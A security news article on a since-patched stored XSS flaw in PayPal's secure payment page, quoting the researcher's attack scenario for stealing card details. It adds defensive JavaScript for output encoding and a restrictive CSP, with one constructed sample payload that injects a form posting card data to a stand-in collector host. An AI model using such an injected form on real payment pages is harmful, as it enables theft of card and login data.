Stored XSS Vulnerability In PayPal To Steal Your Credit Card Information

Security expert Ebrahim Hegazy found a stored XSS vulnerability in PayPal's secure payment page (https://Securepayments.Paypal.com). When a user makes an online purchase with PayPal, the user is redirected to PayPal's SecurePayments domain, which asks for the credit card information, CVV and expiry date to complete the transaction. The vulnerability found in the secure payment page lets an attacker steal credit card information and login credentials even though the data is processed through an encrypted channel (HTTPS).



Hacking PayPal
As Ebrahim Hegazy (@Zigoo0) reported in a blog post:
“I’ve found a Stored XSS vulnerability that affects the SecurePayment page directly which allowed me to alter the page HTML and rewrite the page content. An attacker can provide his own HTML forms to the user to fulfill and send the user's data back to the attacker’s server in clear text format, and then use this information to purchase anything on behalf of users or even transfer the users' funds to his own account!”

Attack scenario of stored XSS vulnerability

Ebrahim explained that the attack scenario is:
  • Attacker sets up a shopping site or hacks into any shopping site, and alters the “CheckOut” button with the PayPal vulnerability,
  • PayPal user browses the malformed shopping site, chooses some products, and clicks the “CheckOut” button to pay with his PayPal account,
  • User gets redirected to https://Securepayments.Paypal.com/ to fill in the required credit card information to complete the purchase order. The price of the products that will be paid is included in the same page, and as we know the attacker now controls this page!
  • Now when the PayPal user clicks the Submit Payment button, instead of paying let’s say “100$” YOU WILL PAY THE ATTACKER WHATEVER AMOUNT THE ATTACKER DECIDES!!
The expert published a video PoC that shows how an attacker exploits the vulnerability to steal the user's credit card and login credential information.
The expert reported the flaw to PayPal on 19 June 2015 and got a response from PayPal the same day; the vulnerability has now been patched by PayPal.
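
The scenario above depends on stored, attacker-controlled markup being rendered into the payment page. The following is an added example, not PayPal's code or the researcher's: it renders a hosted payment page with every stored merchant string HTML-encoded at output time and sends a Content-Security-Policy whose `form-action` limits where forms can post. The order fields, the `/pay` path and the choice of an item name as the injected value are assumptions, since the report does not say which field was affected.

```javascript
// Added example: the order shape, field names and /pay path are hypothetical.

// Encode the five characters that can break out of HTML text or a quoted attribute.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Policy for the payment page: no inline script, and forms may only post back
// to the page's own origin, so an injected <form> cannot send card data elsewhere.
function paymentPageCsp() {
  return [
    "default-src 'self'",
    "script-src 'self'",
    "form-action 'self'",
    "base-uri 'none'",
    "frame-ancestors 'none'",
  ].join("; ");
}

// Render the page from a stored order. Merchant-supplied strings are encoded at
// output time; the amount is formatted from an integer number of cents kept
// server-side (an assumption of this example), never echoed from merchant text.
function renderPaymentPage(order) {
  if (!Number.isInteger(order.amountCents) || order.amountCents < 0) {
    throw new TypeError("amountCents must be a non-negative integer");
  }
  const amount = (order.amountCents / 100).toFixed(2);
  const body = [
    "<!doctype html>",
    `<title>Pay ${escapeHtml(order.merchantName)}</title>`,
    `<p class="item">${escapeHtml(order.itemName)}</p>`,
    `<p class="total">${amount} ${escapeHtml(order.currency)}</p>`,
    '<form method="post" action="/pay">',
    `<input type="hidden" name="order" value="${escapeHtml(order.id)}">`,
    '<input name="card" autocomplete="cc-number">',
    '<button type="submit">Submit Payment</button>',
    "</form>",
  ].join("\n");
  return { headers: { "Content-Security-Policy": paymentPageCsp() }, body };
}

// Constructed sample: a stored item name carrying markup for a second form.
const sampleOrder = {
  id: "ord-1001", merchantName: "Example Shop", currency: "USD", amountCents: 10000,
  itemName: '"><form action="https://collector.invalid/c"><input name="card"></form>',
};
```

Output encoding is the primary fix; the `form-action` directive is a second layer that still constrains form submissions if an encoding call is missed somewhere.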